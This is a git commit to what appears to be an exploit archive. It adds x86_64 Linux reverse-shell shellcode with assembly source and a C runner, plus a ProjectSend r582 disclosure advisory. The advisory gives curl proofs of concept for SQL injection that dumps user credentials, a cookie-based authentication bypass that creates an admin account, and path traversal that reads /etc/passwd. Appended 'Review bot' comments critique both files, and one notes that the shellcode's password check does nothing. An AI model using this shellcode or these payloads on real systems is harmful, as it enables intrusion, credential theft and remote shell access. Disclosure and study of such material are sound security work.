DB: 2016-01-30
2 new exploits
parent
958f5c3f9d
commit
bf22eb1691
3 changed files with 245 additions and 1 deletions
|
@ -32489,7 +32489,6 @@ id,file,description,date,author,platform,type,port
|
|||
36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
|
||||
36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0
|
||||
36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0
|
||||
36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi - Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0
|
||||
36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
|
||||
36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
|
||||
36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
|
||||
|
@ -35624,3 +35623,5 @@ id,file,description,date,author,platform,type,port
|
|||
39380,platforms/osx/dos/39380.c,"OS X - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0
|
||||
39381,platforms/osx/dos/39381.c,"OS X - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0
|
||||
39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
|
||||
39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
|
||||
|
|
110
platforms/lin_x86-64/shellcode/39383.c
Executable file
110
platforms/lin_x86-64/shellcode/39383.c
Executable file
|
@ -0,0 +1,110 @@
|
|||
/*---------------------------------------------------------------------------------------------------------------------
|
||||
/*
|
||||
*Title: tcp reverse shell with password polymorphic version 122 bytes
|
||||
*Author: Sathish kumar
|
||||
*Contact: https://www.linkedin.com/in/sathish94
|
||||
*Copyright: (c) 2016 iQube. (http://iQube.io)
|
||||
*Release Date: January 29, 2016
|
||||
*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
|
||||
*Tested On: Ubuntu 14.04 LTS
|
||||
*SLAE64-1408
|
||||
*Build/Run: gcc -fno-stack-protector -z execstack filename.c -o filename
|
||||
* ./bindshell
|
||||
* nc -l 4444 -vvv
|
||||
*
|
||||
|
||||
|
||||
global _start
|
||||
|
||||
_start:
|
||||
|
||||
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
|
||||
xor rsi, rsi
|
||||
mul rsi
|
||||
add rcx, 0x3
|
||||
push byte 0x2 ;pusing argument to the stack
|
||||
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
|
||||
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
|
||||
push byte 0x29 ; pushing the syscall number into the rax by using stack
|
||||
pop rax
|
||||
syscall
|
||||
|
||||
; copying the socket descripter from rax to rdi register so that we can use it further
|
||||
|
||||
xchg rax, rdi
|
||||
|
||||
; server.sin_family = AF_INET
|
||||
; server.sin_port = htons(PORT)
|
||||
; server.sin_addr.s_addr = INADDR_ANY
|
||||
; bzero(&server.sin_zero, 8)
|
||||
; setting up the data sctructure
|
||||
|
||||
xor rax, rax
|
||||
push rax ; bzero(&server.sin_zero, 8)
|
||||
mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
|
||||
not ebx
|
||||
mov dword [rsp-4], ebx
|
||||
sub rsp , 4 ; adjust the stack
|
||||
push word 0x5c11 ; port 4444 in network byte order
|
||||
push word 0x02 ; AF_INET
|
||||
push rsp
|
||||
pop rsi
|
||||
|
||||
|
||||
push 0x10
|
||||
pop rdx
|
||||
push 0x2a
|
||||
pop rax
|
||||
syscall
|
||||
|
||||
push 0x3
|
||||
pop rsi ; setting argument to 3
|
||||
|
||||
|
||||
|
||||
duplicate:
|
||||
dec esi
|
||||
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
|
||||
syscall
|
||||
jne duplicate
|
||||
|
||||
password_check:
|
||||
|
||||
push rsp
|
||||
pop rsi
|
||||
xor rax, rax ; system read syscall value is 0 so rax is set to 0
|
||||
syscall
|
||||
push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
|
||||
pop rax
|
||||
lea rdi, [rel rsi]
|
||||
scasd ; comparing the user input and stored password in the stack
|
||||
|
||||
|
||||
|
||||
execve: ; Execve format , execve("/bin/sh", 0 , 0)
|
||||
xor rsi , rsi
|
||||
mul rsi ; zeroed rax , rdx register
|
||||
push ax ; terminate string with null
|
||||
mov rbx , 0x68732f2f6e69622e ; "/bin//sh" in reverse order
|
||||
inc rbx
|
||||
add rcx, 2
|
||||
push rbx
|
||||
push rsp
|
||||
pop rdi ; set RDI
|
||||
push byte 0x3b ; execve syscall number (59)
|
||||
pop rax
|
||||
syscall
|
||||
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
unsigned char code[] =\
|
||||
"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x48\x83\xc1\x03\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb\x80\xff\xff\xfe\xf7\xd3\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68\x11\x5c\x66\x6a\x02\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x54\x5e\x48\x31\xc0\x0f\x05\x68\x68\x61\x63\x6b\x58\x48\x8d\x3e\xaf\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2e\x62\x69\x6e\x2f\x2f\x73\x68\x48\xff\xc3\x48\x83\xc1\x02\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
|
||||
main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n", (int)strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
}
|
||||
|
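Review bot: The password check ends at `scasd` with nothing consuming the flags it sets — no conditional branch follows it, and the assembled bytes in `code[]` confirm this (`\xaf` is immediately followed by `\x48\x31\xf6`, the `xor rsi, rsi` that opens the execve block), so the shell is spawned whatever the preceding `read` returned. The "with Password" wording in the header `*Title` line and in the files.csv description therefore does not describe this sample; either the header should say the check is inert, or the source needs a branch on ZF after `scasd`. The source line `lea rdi, [rel rsi]` also does not match what was emitted (`\x48\x8d\x3e` is `lea rdi, [rsi]`; `rel` has no meaning with a register base) and should be written as assembled, and the two `add rcx, …` instructions deserve a comment such as `; polymorphic filler: rcx is dead here (syscall clobbers it)` so a reader does not trace them as state. In the harness, `main()` has an implicit return type (invalid since C99) and `code[]` lives in writable data, so execution relies on `-z execstack` turning the whole image executable through READ_IMPLIES_EXEC — a behaviour that, as far as I recall, later 64-bit kernels no longer apply to executable-stack binaries — which the `*Tested On` / `*Build/Run` lines should state as a limitation rather than leave implicit.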
133
platforms/php/webapps/39385.txt
Executable file
133
platforms/php/webapps/39385.txt
Executable file
|
@ -0,0 +1,133 @@
|
|||
Advisory ID: SGMA-16001
|
||||
Title: ProjectSend multiple vulnerabilities
|
||||
Product: ProjectSend (previously cFTP)
|
||||
Version: r582 and probably prior
|
||||
Vendor: www.projectsend.org
|
||||
Vulnerability type: SQL-injection, Auth bypass, Arbitrary File Access, Insecure Object Reference
|
||||
Risk level: 4 / 5
|
||||
Credit: filippo.cavallarin@wearesegment.com
|
||||
CVE: N/A
|
||||
Vendor notification: 2015-11-05
|
||||
Vendor fix: N/A
|
||||
Public disclosure: 2016-01-29
|
||||
|
||||
|
||||
ProjectSend (previously cFTP) suffers from multiple vulnerabilities:
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
|
||||
The following proof-of-concept demostrates this issue by downloading login credentials of registered users:
|
||||
|
||||
curl -X POST 'http://projectsend.local/manage-files.php?client_id=1' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22' --data "status=10' and 0 union select 0,1 ,'0) or 1 union select 0,1,concat(user,char(32),password),3,4,5,6,7,8,9 from tbl_users -- a',3,4,5,6,'7"
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "files" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
|
||||
The following proof-of-concept demostrates this issue by injecting a SLEEP command into the database engine:
|
||||
|
||||
curl -X POST 'http://projectsend.local/manage-files.php' --data 'files_actions=delete&do_action=&files%5B%5D=5) OR 1=sleep(10' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22'
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "selected_clients" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
|
||||
There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 63.
|
||||
|
||||
$selected_clients = $_POST['selected_clients'];
|
||||
$clients_to_get = mysql_real_escape_string(implode(',',array_unique($selected_clients)));
|
||||
$sql_user = $database->query("SELECT id, name FROM tbl_users WHERE id IN ($clients_to_get)");
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
|
||||
There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 146.
|
||||
|
||||
$status_filter = $_POST['status'];
|
||||
$cq .= " AND active='$status_filter'";
|
||||
[...]
|
||||
$sql = $database->query($cq);
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script process-zip-download.php suffers from a SQL-Injection vulnerability because the request parameter "file" is used to build a sql query without beeing properly sanitized.
|
||||
There is no POC available, but the vulnerability is easy to spot by looking at the source code.
|
||||
|
||||
$files_to_zip = explode(',',substr($_GET['file'], 0, -1));
|
||||
[...]
|
||||
foreach ($files_to_zip as $file_to_zip) {
|
||||
[...]
|
||||
$sql_url = $database->query('SELECT id, expires, expiry_date FROM tbl_files WHERE url="' . $file_to_zip .'"');
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script home-log.php suffers from a SQL-Injection vulnerability because the request parameter "action" is used to build a sql query without beeing properly sanitized.
|
||||
There is no POC available, but the vulnerability is easy to spot by looking at the source code.
|
||||
|
||||
$log_action = $_GET['action'];
|
||||
$log_query = "SELECT * FROM tbl_actions_log";
|
||||
if (!empty($log_action)) {
|
||||
$log_query .= " WHERE action = '$log_action'";
|
||||
|
||||
|
||||
|
||||
- Authentication Bypass
|
||||
|
||||
An Authenticaton Bypass vulnerability has been discovered in multiple pages. By adding a cookie to request it is possible to bypass certain authentication checks and gain access to protected resources.
|
||||
The following proof-of-concepts are available:
|
||||
|
||||
Lists all registered users:
|
||||
curl http://projectsend.local/users.php -H 'Cookie: userlevel=9'
|
||||
|
||||
Add an Admin user to the database:
|
||||
curl http://projectsend.local/users-add.php -H 'Cookie: userlevel=9' -X POST --data 'add_user_form_name=necci&add_user_form_email=poplix@papuasia.org&add_user_form_level=9&add_user_form_user=necci&add_user_form_active=1&add_user_form_pass=123456'
|
||||
|
||||
Read file statsictics:
|
||||
curl http://projectsend.local/home.php -H 'Cookie: userlevel=9'
|
||||
|
||||
Read file details:
|
||||
curl http://projectsend.local/edit-file.php?file_id=1 -H 'Cookie: userlevel=9'
|
||||
|
||||
Bypass authentication:
|
||||
curl 'http://projectsend.local/process-zip-download.php' -H 'Cookie: userlevel=8'
|
||||
|
||||
|
||||
- Arbitrary File Download
|
||||
|
||||
The page process-zip-download.php fails to restrict access to local files. By injecting a path traversal vector into the "file" parameter it is possible to read an arbitrary file from the server.
|
||||
By combining this vulnerability with the Authentication Bypass affecting the same file, is possible for a non-authenticated user to gain access to protected data.
|
||||
The followinf proof-of-concept is available.
|
||||
|
||||
curl 'http://projectsend.local/process-zip-download.php?file=../../../../../../../../etc/passwdd' -H 'Cookie: userlevel=8' > ttt.zip
|
||||
|
||||
|
||||
- Insecure Direct Object References
|
||||
|
||||
The page actions.log.export.php fails to perform authentication checks so it's possible for anyone to access logs data.
|
||||
The followinf proof-of-concept is available.
|
||||
|
||||
curl http://projectsend.local/includes/actions.log.export.php
|
||||
|
||||
|
||||
Solution
|
||||
No solution is available at the time of writing.
|
||||
The vendor has been contacted about three months before the public disclosure, but he stopped responding after we sent him our report.
|
||||
|
||||
|
||||
References
|
||||
https://www.wearesegment.com/research/Projectsend_multiple_vulnerabilities
|
||||
http://www.projectsend.org
|
||||
|
||||
|
||||
Filippo Cavallarin
|
||||
https://wearesegment.com
|
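Review bot: The `Solution` section only says that no fix exists, yet the quoted snippets show the root causes plainly, so the advisory should state the remediation a deployer can apply while waiting for the vendor: replace string-built queries such as `$cq .= " AND active='$status_filter'"` with parameterized statements (note that `mysql_real_escape_string` over a comma-joined `IN (...)` list, as in the clients.php excerpt, does not quote the individual values, which is why that line is still injectable), and never derive authorization from a client-controlled `userlevel` cookie — the level must come from the server-side session. It would also help defenders to name what to look for in access logs, since detection is the only option on the affected version: POSTs to manage-files.php or clients.php carrying SQL fragments in `status` or `files[]`, requests presenting a bare `userlevel` cookie, and `process-zip-download.php?file=` values containing `../`. Finally, "r582 and probably prior" in the `Version` line should be labelled as untested rather than asserted, so readers do not treat the claim as verified.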